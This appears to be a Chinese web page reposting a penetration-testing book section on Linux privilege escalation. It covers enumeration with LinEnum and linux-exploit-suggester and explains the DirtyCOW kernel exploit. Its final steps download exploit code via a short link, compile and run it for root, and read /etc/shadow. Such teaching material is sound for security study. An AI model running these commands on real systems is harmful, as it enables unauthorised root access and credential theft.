返回介绍

4.12 权限提升

发布于 2024-10-13 11:41:07 字数 1663 浏览 0 评论 0 收藏 0

Linux 权限提升的方法绝大部分类似于 Windows。我们查找存在漏洞的服务,例如可以写入文件、错误配置粘滞位、文件中的明文密码、全局可写文件、定时任务,当然还有补丁问题。

为了有效和高效地分析 Linux 设备权限提升的问题,可以使用一些工具完成所有的工作。

在进行任何类型的权限提升漏洞挖掘之前,首先了解 Linux 主机和系统的所有信息,包括用户、服务、定时任务、软件版本、弱凭证、错误配置的文件权限,甚至是 Docker 信息。我们可以使用一个名为 LinEnum 的工具完成所有琐碎的工作,如图 4.47 所示。

0447

图 4.47

这是一份非常详细的分析报告,涉及您想要了解的所有关于底层系统的信息,对于后面的行动非常有帮助。

在获得系统的信息后,我们会尝试利用这些漏洞。如果在服务和定时任务中找不到任何粘滞位漏洞或错误配置漏洞,那么我们会查找系统/应用程序的漏洞。我尝试发现漏洞,最终总是有可能突破的设备。

我们可以运行一个名为 inux-exploit-suggester 的工具,分析主机系统,识别未打的补丁和存在的漏洞。一旦发现漏洞,该工具还将提供 PoC 漏洞利用工具的链接,如图 4.48 所示。

0448

图 4.48

现在,我们还要寻找什么漏洞?这时实践经验就真正发挥作用了。在我的“实验室”中,我配置大量不同的 Linux 版本,验证这些漏洞是否会导致底层系统崩溃。在这个场景中,我最愿意研究的漏洞之一是 DirtyCOW。

DirtyCOW 漏洞的描述:Linux 内核的内存子系统在处理写入只读私有映射地址时,出现了资源竞争。非特权本地用户利用这个漏洞,获取对其他只读内存映射的写访问权,从而实现了权限提升。

简而言之,此漏洞允许攻击者通过内核漏洞,从非特权用户提升到 root 用户。这是我们想要实现的权限提升方式!但问题是,这种方式容易引起内核崩溃,因此必须确保在正确的 Linux 内核上使用正确的工具版本。

在 Ubuntu 中测试 DirtyCOW(ubuntu 14.04.1 LTS 3.13.0-32-generic x86_64)。

  • 下载 DirtyCOW 静荷。
    • wget http://bit.ly/2vdh2Ub -O dirtycow-mem.c
  • 编译 DirtyCOW 静荷。
    • gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
  • 运行 DirtyCOW 获取系统权限。
    • ./dirtycow-mem
  • 关闭定期回写机制,确保漏洞稳定性。
    • echo 0 >/proc/sys/vm/dirty_writeback_centisecs
  • 尝试读取 shadow 文件。
    • cat /etc/shadow

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文